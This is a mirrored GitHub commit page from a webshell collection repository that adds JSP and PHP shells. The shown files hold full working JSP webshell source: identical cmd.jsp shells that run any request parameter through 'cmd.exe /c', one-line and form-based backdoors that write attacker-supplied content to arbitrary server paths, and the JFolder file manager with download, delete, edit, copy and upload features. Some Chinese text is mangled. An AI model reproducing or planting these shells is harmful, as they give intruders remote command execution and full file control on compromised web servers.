mirror of
https://github.com/tennc/webshell
synced 2024-11-21 18:53:03 +00:00
update
php shell and jsp shell
This commit is contained in:
parent
5ba51580de
commit
df6d55ad4f
29 changed files with 7756 additions and 0 deletions
3312
jsp/0000.jsp
Normal file
3312
jsp/0000.jsp
Normal file
File diff suppressed because it is too large
Load diff
31
jsp/1.jsp
Normal file
31
jsp/1.jsp
Normal file
|
@ -0,0 +1,31 @@
|
|||
<%@ page import="java.util.*,java.io.*,java.net.*"%>
|
||||
<%
|
||||
//
|
||||
// JSP_KIT
|
||||
//
|
||||
// cmd.jsp = Command Execution (win32)
|
||||
//
|
||||
// by: Unknown
|
||||
// modified: 27/06/2003
|
||||
//
|
||||
%>
|
||||
<HTML><BODY>
|
||||
<FORM METHOD="POST" NAME="myform" ACTION="">
|
||||
<INPUT TYPE="text" NAME="cmd">
|
||||
<INPUT TYPE="submit" VALUE="Send">
|
||||
</FORM>
|
||||
<pre>
|
||||
<%
|
||||
if (request.getParameter("cmd") != null) {
|
||||
out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
|
||||
Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
|
||||
OutputStream os = p.getOutputStream();
|
||||
InputStream in = p.getInputStream();
|
||||
DataInputStream dis = new DataInputStream(in);
|
||||
String disr = dis.readLine();
|
||||
while ( disr != null ) {
|
||||
out.println(disr); disr = dis.readLine(); }
|
||||
}
|
||||
%>
|
||||
</pre>
|
||||
</BODY></HTML>
|
31
jsp/102.jsp
Normal file
31
jsp/102.jsp
Normal file
|
@ -0,0 +1,31 @@
|
|||
<%@ page import="java.util.*,java.io.*,java.net.*"%>
|
||||
<%
|
||||
//
|
||||
// JSP_KIT
|
||||
//
|
||||
// cmd.jsp = Command Execution (win32)
|
||||
//
|
||||
// by: Unknown
|
||||
// modified: 27/06/2003
|
||||
//
|
||||
%>
|
||||
<HTML><BODY>
|
||||
<FORM METHOD="POST" NAME="myform" ACTION="">
|
||||
<INPUT TYPE="text" NAME="cmd">
|
||||
<INPUT TYPE="submit" VALUE="Send">
|
||||
</FORM>
|
||||
<pre>
|
||||
<%
|
||||
if (request.getParameter("cmd") != null) {
|
||||
out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
|
||||
Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
|
||||
OutputStream os = p.getOutputStream();
|
||||
InputStream in = p.getInputStream();
|
||||
DataInputStream dis = new DataInputStream(in);
|
||||
String disr = dis.readLine();
|
||||
while ( disr != null ) {
|
||||
out.println(disr); disr = dis.readLine(); }
|
||||
}
|
||||
%>
|
||||
</pre>
|
||||
</BODY></HTML>
|
47
jsp/12302.jsp
Normal file
47
jsp/12302.jsp
Normal file
|
@ -0,0 +1,47 @@
|
|||
<%@page contentType="text/html;charset=gb2312"%>
|
||||
<%@page import="java.io.*,java.util.*,java.net.*"%>
|
||||
<html>
|
||||
<head>
|
||||
<title>JspDo Code By Xiao.3</title>
|
||||
<style type="text/css">
|
||||
body { color:red; font-size:12px; background-color:white; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<%
|
||||
if(request.getParameter("context")!=null)
|
||||
{
|
||||
String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"gb2312");
|
||||
String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"gb2312");
|
||||
OutputStream pt = null;
|
||||
try {
|
||||
pt = new FileOutputStream(path);
|
||||
pt.write(context.getBytes());
|
||||
out.println("<a href='"+request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+request.getRequestURI()+"'><font color='red' title='????????????è????°???????????????é??é??!'>????????????!</font></a>");
|
||||
} catch (FileNotFoundException ex2) {
|
||||
out.println("<font color='red'>???????¤±è??!</font>");
|
||||
} catch (IOException ex) {
|
||||
out.println("<font color='red'>???????¤±è??!</font>");
|
||||
} finally {
|
||||
try {
|
||||
pt.close();
|
||||
} catch (IOException ex3) {
|
||||
out.println("<font color='red'>???????¤±è??!</font>");
|
||||
}
|
||||
}
|
||||
}
|
||||
%>
|
||||
<form name="frmUpload" method="post" action="">
|
||||
<font color="blue">????????????è·????:</font><%out.print(request.getRealPath(request.getServletPath())); %>
|
||||
<br>
|
||||
<br>
|
||||
<font color="blue">????????????è·????:</font><input type="text" size="70" name="path" value="<%out.print(getServletContext().getRealPath("/")); %>">
|
||||
<br>
|
||||
<br>
|
||||
??????????????????:<textarea name="context" id="context" style="width: 51%; height: 150px;"></textarea>
|
||||
<br>
|
||||
<br>
|
||||
<input type="submit" name="btnSubmit" value="Upload">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
1
jsp/IXRbE.jsp
Normal file
1
jsp/IXRbE.jsp
Normal file
|
@ -0,0 +1 @@
|
|||
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>xIXRbE.jspx
|
1
jsp/IXRbE02.jsp
Normal file
1
jsp/IXRbE02.jsp
Normal file
|
@ -0,0 +1 @@
|
|||
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>xIXRbE.jspx
|
993
jsp/data.jsp
Normal file
993
jsp/data.jsp
Normal file
|
@ -0,0 +1,993 @@
|
|||
<%
|
||||
/**
|
||||
JFolder V0.9 windows platform
|
||||
@Filename?? JFolder.jsp
|
||||
@Description?? ?????ò???????????????????????ò???à????×??????í?÷???á???ù±?????????×÷????????????????
|
||||
|
||||
@Bugs : ?????±??????????????·¨????????
|
||||
*/
|
||||
%>
|
||||
<%@ page contentType="text/html;charset=gb2312"%>
|
||||
<%@page import="java.io.*,java.util.*,java.net.*" %>
|
||||
<%!
|
||||
private final static int languageNo=0; //????°?±???0 : ?????? 1??????
|
||||
String strThisFile="JFolder.jsp";
|
||||
String[] authorInfo={" <font color=red> °??????ú </font>"," <font color=red> Thanks for your support - - by Steven Cee http://www.topronet.com </font>"};
|
||||
String[] strFileManage = {"?? ?? ?? ?í","File Management"};
|
||||
String[] strCommand = {"CMD ?ü ??","Command Window"};
|
||||
String[] strSysProperty = {"?? ?? ?? ??","System Property"};
|
||||
String[] strHelp = {"°? ?ú","Help"};
|
||||
String[] strParentFolder = {"????????","Parent Folder"};
|
||||
String[] strCurrentFolder= {"?±?°????","Current Folder"};
|
||||
String[] strDrivers = {"?????÷","Drivers"};
|
||||
String[] strFileName = {"????????","File Name"};
|
||||
String[] strFileSize = {"?????ó??","File Size"};
|
||||
String[] strLastModified = {"×??ó????","Last Modified"};
|
||||
String[] strFileOperation= {"??????×÷","Operations"};
|
||||
String[] strFileEdit = {"????","Edit"};
|
||||
String[] strFileDown = {"????","Download"};
|
||||
String[] strFileCopy = {"????","Move"};
|
||||
String[] strFileDel = {"????","Delete"};
|
||||
String[] strExecute = {"????","Execute"};
|
||||
String[] strBack = {"·???","Back"};
|
||||
String[] strFileSave = {"±???","Save"};
|
||||
|
||||
public class FileHandler
|
||||
{
|
||||
private String strAction="";
|
||||
private String strFile="";
|
||||
void FileHandler(String action,String f)
|
||||
{
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
public static class UploadMonitor {
|
||||
|
||||
static Hashtable uploadTable = new Hashtable();
|
||||
|
||||
static void set(String fName, UplInfo info) {
|
||||
uploadTable.put(fName, info);
|
||||
}
|
||||
|
||||
static void remove(String fName) {
|
||||
uploadTable.remove(fName);
|
||||
}
|
||||
|
||||
static UplInfo getInfo(String fName) {
|
||||
UplInfo info = (UplInfo) uploadTable.get(fName);
|
||||
return info;
|
||||
}
|
||||
}
|
||||
|
||||
public class UplInfo {
|
||||
|
||||
public long totalSize;
|
||||
public long currSize;
|
||||
public long starttime;
|
||||
public boolean aborted;
|
||||
|
||||
public UplInfo() {
|
||||
totalSize = 0l;
|
||||
currSize = 0l;
|
||||
starttime = System.currentTimeMillis();
|
||||
aborted = false;
|
||||
}
|
||||
|
||||
public UplInfo(int size) {
|
||||
totalSize = size;
|
||||
currSize = 0;
|
||||
starttime = System.currentTimeMillis();
|
||||
aborted = false;
|
||||
}
|
||||
|
||||
public String getUprate() {
|
||||
long time = System.currentTimeMillis() - starttime;
|
||||
if (time != 0) {
|
||||
long uprate = currSize * 1000 / time;
|
||||
return convertFileSize(uprate) + "/s";
|
||||
}
|
||||
else return "n/a";
|
||||
}
|
||||
|
||||
public int getPercent() {
|
||||
if (totalSize == 0) return 0;
|
||||
else return (int) (currSize * 100 / totalSize);
|
||||
}
|
||||
|
||||
public String getTimeElapsed() {
|
||||
long time = (System.currentTimeMillis() - starttime) / 1000l;
|
||||
if (time - 60l >= 0){
|
||||
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
|
||||
else return time / 60 + ":0" + (time % 60) + "m";
|
||||
}
|
||||
else return time<10 ? "0" + time + "s": time + "s";
|
||||
}
|
||||
|
||||
public String getTimeEstimated() {
|
||||
if (currSize == 0) return "n/a";
|
||||
long time = System.currentTimeMillis() - starttime;
|
||||
time = totalSize * time / currSize;
|
||||
time /= 1000l;
|
||||
if (time - 60l >= 0){
|
||||
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
|
||||
else return time / 60 + ":0" + (time % 60) + "m";
|
||||
}
|
||||
else return time<10 ? "0" + time + "s": time + "s";
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
public class FileInfo {
|
||||
|
||||
public String name = null, clientFileName = null, fileContentType = null;
|
||||
private byte[] fileContents = null;
|
||||
public File file = null;
|
||||
public StringBuffer sb = new StringBuffer(100);
|
||||
|
||||
public void setFileContents(byte[] aByteArray) {
|
||||
fileContents = new byte[aByteArray.length];
|
||||
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
|
||||
}
|
||||
}
|
||||
|
||||
// A Class with methods used to process a ServletInputStream
|
||||
public class HttpMultiPartParser {
|
||||
|
||||
private final String lineSeparator = System.getProperty("line.separator", "\n");
|
||||
private final int ONE_MB = 1024 * 1;
|
||||
|
||||
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
|
||||
int clength) throws IllegalArgumentException, IOException {
|
||||
if (is == null) throw new IllegalArgumentException("InputStream");
|
||||
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
|
||||
"\"" + boundary + "\" is an illegal boundary indicator");
|
||||
boundary = "--" + boundary;
|
||||
StringTokenizer stLine = null, stFields = null;
|
||||
FileInfo fileInfo = null;
|
||||
Hashtable dataTable = new Hashtable(5);
|
||||
String line = null, field = null, paramName = null;
|
||||
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
|
||||
boolean isFile = false;
|
||||
if (saveFiles) { // Create the required directory (including parent dirs)
|
||||
File f = new File(saveInDir);
|
||||
f.mkdirs();
|
||||
}
|
||||
line = getLine(is);
|
||||
if (line == null || !line.startsWith(boundary)) throw new IOException(
|
||||
"Boundary not found; boundary = " + boundary + ", line = " + line);
|
||||
while (line != null) {
|
||||
if (line == null || !line.startsWith(boundary)) return dataTable;
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
stLine = new StringTokenizer(line, ";\r\n");
|
||||
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
|
||||
"Bad data in second line");
|
||||
line = stLine.nextToken().toLowerCase();
|
||||
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
|
||||
"Bad data in second line");
|
||||
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
|
||||
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
|
||||
"Bad data in second line");
|
||||
fileInfo = new FileInfo();
|
||||
stFields.nextToken();
|
||||
paramName = stFields.nextToken();
|
||||
isFile = false;
|
||||
if (stLine.hasMoreTokens()) {
|
||||
field = stLine.nextToken();
|
||||
stFields = new StringTokenizer(field, "=\"");
|
||||
if (stFields.countTokens() > 1) {
|
||||
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
|
||||
fileInfo.name = paramName;
|
||||
String value = stFields.nextToken();
|
||||
if (value != null && value.trim().length() > 0) {
|
||||
fileInfo.clientFileName = value;
|
||||
isFile = true;
|
||||
}
|
||||
else {
|
||||
line = getLine(is); // Skip "Content-Type:" line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Position to boundary line
|
||||
continue;
|
||||
}
|
||||
}
|
||||
}
|
||||
else if (field.toLowerCase().indexOf("filename") >= 0) {
|
||||
line = getLine(is); // Skip "Content-Type:" line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Position to boundary line
|
||||
continue;
|
||||
}
|
||||
}
|
||||
boolean skipBlankLine = true;
|
||||
if (isFile) {
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
if (line.trim().length() < 1) skipBlankLine = false;
|
||||
else {
|
||||
stLine = new StringTokenizer(line, ": ");
|
||||
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
|
||||
"Bad data in third line");
|
||||
stLine.nextToken(); // Content-Type
|
||||
fileInfo.fileContentType = stLine.nextToken();
|
||||
}
|
||||
}
|
||||
if (skipBlankLine) {
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
}
|
||||
if (!isFile) {
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
dataTable.put(paramName, line);
|
||||
// If parameter is dir, change saveInDir to dir
|
||||
if (paramName.equals("dir")) saveInDir = line;
|
||||
line = getLine(is);
|
||||
continue;
|
||||
}
|
||||
try {
|
||||
UplInfo uplInfo = new UplInfo(clength);
|
||||
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
|
||||
OutputStream os = null;
|
||||
String path = null;
|
||||
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
|
||||
fileInfo.clientFileName));
|
||||
else os = new ByteArrayOutputStream(ONE_MB);
|
||||
boolean readingContent = true;
|
||||
byte previousLine[] = new byte[2 * ONE_MB];
|
||||
byte temp[] = null;
|
||||
byte currentLine[] = new byte[2 * ONE_MB];
|
||||
int read, read3;
|
||||
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
|
||||
line = null;
|
||||
break;
|
||||
}
|
||||
while (readingContent) {
|
||||
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
|
||||
line = null;
|
||||
uplInfo.aborted = true;
|
||||
break;
|
||||
}
|
||||
if (compareBoundary(boundary, currentLine)) {
|
||||
os.write(previousLine, 0, read - 2);
|
||||
line = new String(currentLine, 0, read3);
|
||||
break;
|
||||
}
|
||||
else {
|
||||
os.write(previousLine, 0, read);
|
||||
uplInfo.currSize += read;
|
||||
temp = currentLine;
|
||||
currentLine = previousLine;
|
||||
previousLine = temp;
|
||||
read = read3;
|
||||
}//end else
|
||||
}//end while
|
||||
os.flush();
|
||||
os.close();
|
||||
if (!saveFiles) {
|
||||
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
|
||||
fileInfo.setFileContents(baos.toByteArray());
|
||||
}
|
||||
else fileInfo.file = new File(path);
|
||||
dataTable.put(paramName, fileInfo);
|
||||
uplInfo.currSize = uplInfo.totalSize;
|
||||
}//end try
|
||||
catch (IOException e) {
|
||||
throw e;
|
||||
}
|
||||
}
|
||||
return dataTable;
|
||||
}
|
||||
|
||||
/**
|
||||
* Compares boundary string to byte array
|
||||
*/
|
||||
private boolean compareBoundary(String boundary, byte ba[]) {
|
||||
byte b;
|
||||
if (boundary == null || ba == null) return false;
|
||||
for (int i = 0; i < boundary.length(); i++)
|
||||
if ((byte) boundary.charAt(i) != ba[i]) return false;
|
||||
return true;
|
||||
}
|
||||
|
||||
/** Convenience method to read HTTP header lines */
|
||||
private synchronized String getLine(ServletInputStream sis) throws IOException {
|
||||
byte b[] = new byte[1024];
|
||||
int read = sis.readLine(b, 0, b.length), index;
|
||||
String line = null;
|
||||
if (read != -1) {
|
||||
line = new String(b, 0, read);
|
||||
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
|
||||
}
|
||||
return line;
|
||||
}
|
||||
|
||||
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
|
||||
String path = null;
|
||||
if (dir == null || fileName == null) throw new IllegalArgumentException(
|
||||
"dir or fileName is null");
|
||||
int index = fileName.lastIndexOf('/');
|
||||
String name = null;
|
||||
if (index >= 0) name = fileName.substring(index + 1);
|
||||
else name = fileName;
|
||||
index = name.lastIndexOf('\\');
|
||||
if (index >= 0) fileName = name.substring(index + 1);
|
||||
path = dir + File.separator + fileName;
|
||||
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
|
||||
else return path.replace('/', File.separatorChar);
|
||||
}
|
||||
} //End of class HttpMultiPartParser
|
||||
|
||||
String formatPath(String p)
|
||||
{
|
||||
StringBuffer sb=new StringBuffer();
|
||||
for (int i = 0; i < p.length(); i++)
|
||||
{
|
||||
if(p.charAt(i)=='\\')
|
||||
{
|
||||
sb.append("\\\\");
|
||||
}
|
||||
else
|
||||
{
|
||||
sb.append(p.charAt(i));
|
||||
}
|
||||
}
|
||||
return sb.toString();
|
||||
}
|
||||
|
||||
/**
|
||||
* Converts some important chars (int) to the corresponding html string
|
||||
*/
|
||||
static String conv2Html(int i) {
|
||||
if (i == '&') return "&";
|
||||
else if (i == '<') return "<";
|
||||
else if (i == '>') return ">";
|
||||
else if (i == '"') return """;
|
||||
else return "" + (char) i;
|
||||
}
|
||||
|
||||
/**
|
||||
* Converts a normal string to a html conform string
|
||||
*/
|
||||
static String htmlEncode(String st) {
|
||||
StringBuffer buf = new StringBuffer();
|
||||
for (int i = 0; i < st.length(); i++) {
|
||||
buf.append(conv2Html(st.charAt(i)));
|
||||
}
|
||||
return buf.toString();
|
||||
}
|
||||
String getDrivers()
|
||||
/**
|
||||
Windows?????????????????ù????????
|
||||
*/
|
||||
{
|
||||
StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
|
||||
File roots[]=File.listRoots();
|
||||
for(int i=0;i<roots.length;i++)
|
||||
{
|
||||
sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
|
||||
sb.append(roots[i]+"</a> ");
|
||||
}
|
||||
return sb.toString();
|
||||
}
|
||||
static String convertFileSize(long filesize)
|
||||
{
|
||||
//bug 5.09M ????5.9M
|
||||
String strUnit="Bytes";
|
||||
String strAfterComma="";
|
||||
int intDivisor=1;
|
||||
if(filesize>=1024*1024)
|
||||
{
|
||||
strUnit = "MB";
|
||||
intDivisor=1024*1024;
|
||||
}
|
||||
else if(filesize>=1024)
|
||||
{
|
||||
strUnit = "KB";
|
||||
intDivisor=1024;
|
||||
}
|
||||
if(intDivisor==1) return filesize + " " + strUnit;
|
||||
strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
|
||||
if(strAfterComma=="") strAfterComma=".0";
|
||||
return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
|
||||
}
|
||||
%>
|
||||
<%
|
||||
request.setCharacterEncoding("gb2312");
|
||||
String tabID = request.getParameter("tabID");
|
||||
String strDir = request.getParameter("path");
|
||||
String strAction = request.getParameter("action");
|
||||
String strFile = request.getParameter("file");
|
||||
String strPath = strDir + "\\" + strFile;
|
||||
String strCmd = request.getParameter("cmd");
|
||||
StringBuffer sbEdit=new StringBuffer("");
|
||||
StringBuffer sbDown=new StringBuffer("");
|
||||
StringBuffer sbCopy=new StringBuffer("");
|
||||
StringBuffer sbSaveCopy=new StringBuffer("");
|
||||
StringBuffer sbNewFile=new StringBuffer("");
|
||||
|
||||
if((tabID==null) || tabID.equals(""))
|
||||
{
|
||||
tabID = "1";
|
||||
}
|
||||
|
||||
if(strDir==null||strDir.length()<1)
|
||||
{
|
||||
strDir = request.getRealPath("/");
|
||||
}
|
||||
|
||||
|
||||
if(strAction!=null && strAction.equals("down"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
if(f.length()==0)
|
||||
{
|
||||
sbDown.append("?????ó???? 0 ×???????????????°?");
|
||||
}
|
||||
else
|
||||
{
|
||||
response.setHeader("content-type","text/html; charset=ISO-8859-1");
|
||||
response.setContentType("APPLICATION/OCTET-STREAM");
|
||||
response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
|
||||
FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
|
||||
out.clearBuffer();
|
||||
int i;
|
||||
while ((i=fileInputStream.read()) != -1)
|
||||
{
|
||||
out.write(i);
|
||||
}
|
||||
fileInputStream.close();
|
||||
out.close();
|
||||
}
|
||||
}
|
||||
|
||||
if(strAction!=null && strAction.equals("del"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
f.delete();
|
||||
}
|
||||
|
||||
if(strAction!=null && strAction.equals("edit"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
|
||||
sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
|
||||
sbEdit.append("<input type=hidden name=action value=save >\r\n");
|
||||
sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
|
||||
sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
|
||||
sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
|
||||
sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> "+strPath+"\r\n");
|
||||
sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
|
||||
String line="";
|
||||
while((line=br.readLine())!=null)
|
||||
{
|
||||
sbEdit.append(htmlEncode(line)+"\r\n");
|
||||
}
|
||||
sbEdit.append("</textarea>");
|
||||
sbEdit.append("<input type=hidden name=path value="+strDir+">");
|
||||
sbEdit.append("</form>");
|
||||
}
|
||||
|
||||
if(strAction!=null && strAction.equals("save"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
|
||||
String strContent=request.getParameter("content");
|
||||
bw.write(strContent);
|
||||
bw.close();
|
||||
}
|
||||
if(strAction!=null && strAction.equals("copy"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
|
||||
sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
|
||||
sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
|
||||
sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
|
||||
sbCopy.append("?????????? "+strPath+"<p>");
|
||||
sbCopy.append("??±ê?????? <input type=text name=file2 size=40 value='"+strDir+"'><p>");
|
||||
sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
|
||||
sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p> \r\n");
|
||||
sbCopy.append("</form>");
|
||||
}
|
||||
if(strAction!=null && strAction.equals("savecopy"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
String strDesFile=request.getParameter("file2");
|
||||
if(strDesFile==null || strDesFile.equals(""))
|
||||
{
|
||||
sbSaveCopy.append("<p><font color=red>??±ê?????í?ó??</font>");
|
||||
}
|
||||
else
|
||||
{
|
||||
File f_des=new File(strDesFile);
|
||||
if(f_des.isFile())
|
||||
{
|
||||
sbSaveCopy.append("<p><font color=red>??±ê??????????,??????????</font>");
|
||||
}
|
||||
else
|
||||
{
|
||||
String strTmpFile=strDesFile;
|
||||
if(f_des.isDirectory())
|
||||
{
|
||||
if(!strDesFile.endsWith("\\"))
|
||||
{
|
||||
strDesFile=strDesFile+"\\";
|
||||
}
|
||||
strTmpFile=strDesFile+"cqq_"+strFile;
|
||||
}
|
||||
|
||||
File f_des_copy=new File(strTmpFile);
|
||||
FileInputStream in1=new FileInputStream(f);
|
||||
FileOutputStream out1=new FileOutputStream(f_des_copy);
|
||||
byte[] buffer=new byte[1024];
|
||||
int c;
|
||||
while((c=in1.read(buffer))!=-1)
|
||||
{
|
||||
out1.write(buffer,0,c);
|
||||
}
|
||||
in1.close();
|
||||
out1.close();
|
||||
|
||||
sbSaveCopy.append("???????? ??"+strPath+"<p>");
|
||||
sbSaveCopy.append("??±ê???? ??"+strTmpFile+"<p>");
|
||||
sbSaveCopy.append("<font color=red>??????????</font>");
|
||||
}
|
||||
}
|
||||
sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=·???>");
|
||||
}
|
||||
if(strAction!=null && strAction.equals("newFile"))
|
||||
{
|
||||
String strF=request.getParameter("fileName");
|
||||
String strType1=request.getParameter("btnNewFile");
|
||||
String strType2=request.getParameter("btnNewDir");
|
||||
String strType="";
|
||||
if(strType1==null)
|
||||
{
|
||||
strType="Dir";
|
||||
}
|
||||
else if(strType2==null)
|
||||
{
|
||||
strType="File";
|
||||
}
|
||||
if(!strType.equals("") && !(strF==null || strF.equals("")))
|
||||
{
|
||||
File f_new=new File(strF);
|
||||
if(strType.equals("File") && !f_new.createNewFile())
|
||||
sbNewFile.append(strF+" ???????¨?§°?");
|
||||
if(strType.equals("Dir") && !f_new.mkdirs())
|
||||
sbNewFile.append(strF+" ???????¨?§°?");
|
||||
}
|
||||
else
|
||||
{
|
||||
sbNewFile.append("<p><font color=red>?¨???????ò???????í??</font>");
|
||||
}
|
||||
}
|
||||
|
||||
if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
|
||||
{
|
||||
String tempdir=".";
|
||||
boolean error=false;
|
||||
response.setContentType("text/html");
|
||||
sbNewFile.append("<p><font color=red>?¨???????ò???????í??</font>");
|
||||
HttpMultiPartParser parser = new HttpMultiPartParser();
|
||||
|
||||
int bstart = request.getContentType().lastIndexOf("oundary=");
|
||||
String bound = request.getContentType().substring(bstart + 8);
|
||||
int clength = request.getContentLength();
|
||||
Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
|
||||
if (ht.get("cqqUploadFile") != null)
|
||||
{
|
||||
|
||||
FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
|
||||
File f1 = fi.file;
|
||||
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
|
||||
if (info != null && info.aborted)
|
||||
{
|
||||
f1.delete();
|
||||
request.setAttribute("error", "Upload aborted");
|
||||
}
|
||||
else
|
||||
{
|
||||
String path = (String) ht.get("path");
|
||||
if(path!=null && !path.endsWith("\\"))
|
||||
path = path + "\\";
|
||||
if (!f1.renameTo(new File(path + f1.getName())))
|
||||
{
|
||||
request.setAttribute("error", "Cannot upload file.");
|
||||
error = true;
|
||||
f1.delete();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
%>
|
||||
<html>
|
||||
<head>
|
||||
<style type="text/css">
|
||||
td,select,input,body{font-size:9pt;}
|
||||
A { TEXT-DECORATION: none }
|
||||
|
||||
#tablist{
|
||||
padding: 5px 0;
|
||||
margin-left: 0;
|
||||
margin-bottom: 0;
|
||||
margin-top: 0.1em;
|
||||
font:9pt;
|
||||
}
|
||||
|
||||
#tablist li{
|
||||
list-style: none;
|
||||
display: inline;
|
||||
margin: 0;
|
||||
}
|
||||
|
||||
#tablist li a{
|
||||
padding: 3px 0.5em;
|
||||
margin-left: 3px;
|
||||
border: 1px solid ;
|
||||
background: F6F6F6;
|
||||
}
|
||||
|
||||
#tablist li a:link, #tablist li a:visited{
|
||||
color: navy;
|
||||
}
|
||||
|
||||
#tablist li a.current{
|
||||
background: #EAEAFF;
|
||||
}
|
||||
|
||||
#tabcontentcontainer{
|
||||
width: 100%;
|
||||
padding: 5px;
|
||||
border: 1px solid black;
|
||||
}
|
||||
|
||||
.tabcontent{
|
||||
display:none;
|
||||
}
|
||||
|
||||
</style>
|
||||
|
||||
<script type="text/javascript">
|
||||
|
||||
var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
|
||||
|
||||
////////Stop editting////////////////
|
||||
|
||||
function cascadedstyle(el, cssproperty, csspropertyNS){
|
||||
if (el.currentStyle)
|
||||
return el.currentStyle[cssproperty]
|
||||
else if (window.getComputedStyle){
|
||||
var elstyle=window.getComputedStyle(el, "")
|
||||
return elstyle.getPropertyValue(csspropertyNS)
|
||||
}
|
||||
}
|
||||
|
||||
var previoustab=""
|
||||
|
||||
function expandcontent(cid, aobject){
|
||||
if (document.getElementById){
|
||||
highlighttab(aobject)
|
||||
if (previoustab!="")
|
||||
document.getElementById(previoustab).style.display="none"
|
||||
document.getElementById(cid).style.display="block"
|
||||
previoustab=cid
|
||||
if (aobject.blur)
|
||||
aobject.blur()
|
||||
return false
|
||||
}
|
||||
else
|
||||
return true
|
||||
}
|
||||
|
||||
function highlighttab(aobject){
|
||||
if (typeof tabobjlinks=="undefined")
|
||||
collecttablinks()
|
||||
for (i=0; i<tabobjlinks.length; i++)
|
||||
tabobjlinks[i].style.backgroundColor=initTabcolor
|
||||
var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
|
||||
aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
|
||||
}
|
||||
|
||||
function collecttablinks(){
|
||||
var tabobj=document.getElementById("tablist")
|
||||
tabobjlinks=tabobj.getElementsByTagName("A")
|
||||
}
|
||||
|
||||
function do_onload(){
|
||||
collecttablinks()
|
||||
initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
|
||||
initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
|
||||
expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
|
||||
}
|
||||
|
||||
if (window.addEventListener)
|
||||
window.addEventListener("load", do_onload, false)
|
||||
else if (window.attachEvent)
|
||||
window.attachEvent("onload", do_onload)
|
